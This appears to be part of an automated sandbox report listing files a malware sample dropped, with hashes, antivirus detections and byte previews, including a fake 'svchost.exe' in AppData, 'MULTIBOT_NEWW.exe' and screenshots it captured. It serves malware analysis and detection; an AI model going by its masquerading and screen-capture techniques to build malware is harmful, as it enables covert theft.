                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.4.<./.P.i.d.>.......
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE078.tmp.WERInternalMetadata.xml
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8302
                                                                    Entropy (8bit):3.703646611660962
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNii762W6YRb6jogmf5DSwCprA89bBzsfuLm:RrlsNie6f6Yd6jogmfNSVBYfT
                                                                    MD5:E225D9414F16E474933B5C6E134743F9
                                                                    SHA1:92A9A8298CA258BEC8ECBBD24BD0CCBD22EA1A90
                                                                    SHA-256:25F661A69E6D7C0B71EE29887F7D211CD8D659DD0C33F99E6B0A414912523BF6
                                                                    SHA-512:C3C477F737357861C825068911608C79106A638A22A336CBDB5378148412BF56A62B8A882A69EACC7ADCB5E05B3A9AE4372E602F1DC409EDBC78EEA3DFA85290
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.8.0.<./.P.i.d.>.......
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0E5.tmp.WERInternalMetadata.xml
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8302
                                                                    Entropy (8bit):3.703632832604666
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNi5g69/Ce6YRd6jogmf5BSwCprsx89bB3sfmLm:RrlsNie6J6Yb6jogmfPSnB8f7
                                                                    MD5:7EA759AFEAD8A648D808576BE9174782
                                                                    SHA1:1A645E1D64B1987EBCC32A859FE07117AA294B36
                                                                    SHA-256:CEC1207937AD43D66A1F7CBEA2E636E3E06045AEE3C05FABA753C6CB6DF1EC29
                                                                    SHA-512:454D529F4FEE96D7AFDA7E7CA1ED0CCB769098CC9E8DE4DEFBDF68D2BE8AB9106EBEA16DF2E57265DA34D0CC212DDD123EE231512E8479FFCA7E8D73FC3CDD8A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.9.2.<./.P.i.d.>.......
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE172.tmp.xml
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4708
                                                                    Entropy (8bit):4.454077258851763
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9y8WSC8BG8fm8M4JFKs19EJ+F0+q8vR19EJhi+elJGd:uITfkJ1SNFJFKoWKpR+cJGd
                                                                    MD5:633B7885757E5BC725D1C73075632E31
                                                                    SHA1:88542DE807D2D7A2436FDE3FF75F614157EFCB8A
                                                                    SHA-256:92A23107906A7E672FD84DE42B79BA7671802B265FD6E07F81A0848921F49DC9
                                                                    SHA-512:90AD80F4DDA2D1E5832CA9884E9AF02D757F4229049CDA9BC08946486513C7F72682EE41C43E11A05B94CEEB783BB3F19D5159CE1FC07BCFA3DE0465DFE78D3D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1155093" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE23E.tmp.xml
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4644
                                                                    Entropy (8bit):4.482246274784607
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9y8WSC8B88fm8M4JzEZFUs+q8jUDlu5nVhd:uITfkJ1SNXJ49fDlu5nVhd
                                                                    MD5:2EF23EF76DAEBCFCBCF04D819B06583E
                                                                    SHA1:CF849D769883A499D766792BD7E0668D069FD74A
                                                                    SHA-256:B9A0D438D30585B2E21D153BA3D6AF945F47BF0EB025AB83AACBB8386FE560C4
                                                                    SHA-512:6B301A2D1140059312CB54343250D8A244B153D1D996002EA5D132C6E5B0187F73C6D2B017544E558601E833ED8F8FB3F14F5171E5F491F418F367CA53CE5248
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1155093" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE29C.tmp.xml
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4644
                                                                    Entropy (8bit):4.484315275880367
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9y8WSC8BF8fm8M4JlEZFG++q8VUy+lMSkd:uITfkJ1SNsJaLJflTkd
                                                                    MD5:41AC42D75ECF29A1E124CCE94337CA6B
                                                                    SHA1:36E100F603F2278833206878C1249596AB1A2878
                                                                    SHA-256:0AE6D3B37175B058FDAFD8E1581C3F4516F0FADDF01837095F37A84AAD249F35
                                                                    SHA-512:14AC76C0ABF1B3A00A1569EF69CABE8FC01FC7ED24607A9DCD959CD76F99097419BA22D125B56E83DFF74A414D4AC380F25B4F8AF257267282B3B16406DC17F6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1155093" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.5317531123948465
                                                                    Encrypted:false
                                                                    SSDEEP:768:OGjo7j58ODEYBhzjYBUbBBcJJJB4JnE2rVJjRHNIRFqdXrZjBEwnn:OGU7j58OdZOID8L2E2XbIRFqBrcon
                                                                    MD5:A273A781070D239BA99D3FD8EF341E6C
                                                                    SHA1:650FC260C3CBC8FDB37BD18AFCFA089AA2132B96
                                                                    SHA-256:92EC56AE1720E4B05078BB970C4655904CC61BA11FD13482D1B234504589DF2B
                                                                    SHA-512:A37F71BE8362822018A348F84D41F2549F57B2EC310FAF8086637F0E83D03FBBB2A8E71C6299F535A4CBB01A1E81CBCAE8801EC8DDD0622A80A134C8455F96A2
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Metadefender, Detection: 71%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2*a..................... ......^.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\svchost.exe.log
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):777
                                                                    Entropy (8bit):5.272921406044998
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3LaJcP0/9UkB9t0kaHYGLi1B01kKVdisk70hK9C4XXhK9yi0z6+xaiv:ML2pBLaYgioQ6K/XhKoRr
                                                                    MD5:4D1946DC78B777109FC1B7FF3223B745
                                                                    SHA1:869F3C7550F8B8DE446AE53D6DA234DC24ABD3A5
                                                                    SHA-256:B62BB3914340F56B816EB8883F8459009F25CA430D81948B54F6BE2EBEEFDF76
                                                                    SHA-512:F5BE526A078FB12F42A786A317FB12B13982F382EB0362016AFFCBF122A8A5AB3EB8C406F8EC66ED9AC8E94743B3860D146E6CC5FDC188412F4450403163E7A1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..
                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\iExplorer.exe.log
                                                                    Process:C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):916
                                                                    Entropy (8bit):5.282390836641403
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                                    MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                                    SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                                    SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                                    SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                                    C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe
                                                                    Process:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):7.087713047609385
                                                                    Encrypted:false
                                                                    SSDEEP:1536:/b6C9CMsKBeopXORMapFNglr9JWPSRMMr+caHhGUD10D:z6wthpXeMogpmS6yz
                                                                    MD5:3F620FFD8BE649D1D31AB54F73A559BE
                                                                    SHA1:7674D564413FF4C10297C1D74CD1287776AF43FA
                                                                    SHA-256:60E2A0345F0250CB42AF7B40D674D4EFB3110CD2AE74CB2708F0A9941B1F0AA4
                                                                    SHA-512:0783FBBC5036B5666D57036F58041D08A912BE0B791DC81BA23BE13870F10D909F2C1792852EE2B03344EAB6370E140895545B57C614E96A10B8BFC7682E2D31
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................H...........".....Rich..........PE..L...31*a.................p... ......L.............@.................................~q.......................................m..(...........................................................................(... ....................................text...<`.......p.................. ..`.data...............................@....rsrc...............................@..@..^............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\SImg1.jpeg
                                                                    Process:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):121521
                                                                    Entropy (8bit):7.928604107100963
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTwfOL2Xo/tIZBJwP2HEzvSx2pX8KXI3YaWWku0bKTy:/5TrzTwfW2zJwP2HEzvSuJdUy
                                                                    MD5:CF9EF68993AD0C8075B4789D5B3F7897
                                                                    SHA1:F991B68333095A54D399A6A5207E3CB479A5B844
                                                                    SHA-256:D448AB7674AEC35432DB9C113CD8E766539E6AC623FA3E17043E806D1A91A205
                                                                    SHA-512:74771718AF098B1A53B1F7166E40665400264424E418F61BDB15CA88E06EB01C8C74EA03D568F4F2E3B126786E7933EE28D4B365A441D34D350C982B9CB3F8AE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\SImg2.jpeg
                                                                    Process:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):131323
                                                                    Entropy (8bit):7.925809151767899
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTwfOL2Xo/tIZqaZde3F+gQckwFSmZ9u1LATYq3Vg2WWW7rGcb:/5TrzTwfW28g83F+Od4mu1UThtcb
                                                                    MD5:0C304E96FCE61F274A08F42FF2633F75
                                                                    SHA1:AD125368FFCA36960F459B92C45E05CABECB2BCA
                                                                    SHA-256:57F36FEEA2926B03C4945852B6C47DD08B527F6BBE0DB6A6B3F101786290FBA1
                                                                    SHA-512:633D52188EEAF0D824E053DF430D9BFE40EC8A6C068887B5BDB94FF458BD5228A9C1F3EFE454E003E3A945DF7803FDE73584C6692721B300BD0E0ACE26897853
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\SImg3.jpeg
                                                                    Process:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):129761
                                                                    Entropy (8bit):7.9315607020066965
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTwfOL2Xo/tIZH2CIyZl+SuG6vPh9/FjJ4PzzDg9fM:/5TrzTwfW2oHyZlBmh9/F5M
                                                                    MD5:E87D0E3977F2EF8E5FD0EA5D6867C92D
                                                                    SHA1:5B1C2EA6D347173DD611A5213A0E5DADD2A0814B
                                                                    SHA-256:4AB6FF2F6D8A439724FDDCC2690E709CC479D4575B917AB984888CD6A1011168
                                                                    SHA-512:3E30AA8F4E40DB50F48825AD96F8D95A3A6408DF3B8B763EC3342E48AC4F7A9A9E77BC79594CAC99B4ED7D0A6E5D9B176C944499AB069F035D53F555C2C4D9BE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\SImg4.jpeg
                                                                    Process:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):121818
                                                                    Entropy (8bit):7.934248352298517
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTwfOL2Xo/tIZ5XouE/mh6bVPohqGR7zENzJZUVG:/5TrzTwfW2RImhsVyqGR7wJZUVG
                                                                    MD5:70019051D7AFD8A82FA3EA49FD663358
                                                                    SHA1:F4E685B2959544C50312AF7A56A597C238F053B2
                                                                    SHA-256:B3EBB3DDA23166785394F79BC48126B21F135D5445DE883656AFF7F968A38956
                                                                    SHA-512:9FD5F456E6BC6BC13D860A51362AF1580879D43195C385DFE2C43F1B4043DAEC4A17F1D0C07CC041C2EBD2EA4DD5C356B96A4416E502E24A022ACD3F1C8CBEE7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\Startup SImg.jpeg
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):113445
                                                                    Entropy (8bit):7.935166940604218
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTzvK3yxIGTp4dspGdkIZA9HB1DMG:/5TrzTTK3yxIGTp4WpGdkI6iG
                                                                    MD5:E95B1152C68A79B00F40FD6ED544B1E0
                                                                    SHA1:7A61C83E1163C62F4E4991C5ADD7A354196C475B
                                                                    SHA-256:104A575ECACD0B4E48F1830677B95C3C76D5B1D7EE4A8EF2284617C528C5D782
                                                                    SHA-512:35F4977B1C9795AF5E791D0ACCA5A803E9D27F6BA7D28F8952EBC1A79A9C024805188F4F9B3BA249C1062BAC8C17B0941936C62AA2D8CC7D838C84A78988AB2C
                                                                    Malicious:false
                                                                    Reputation:unknown
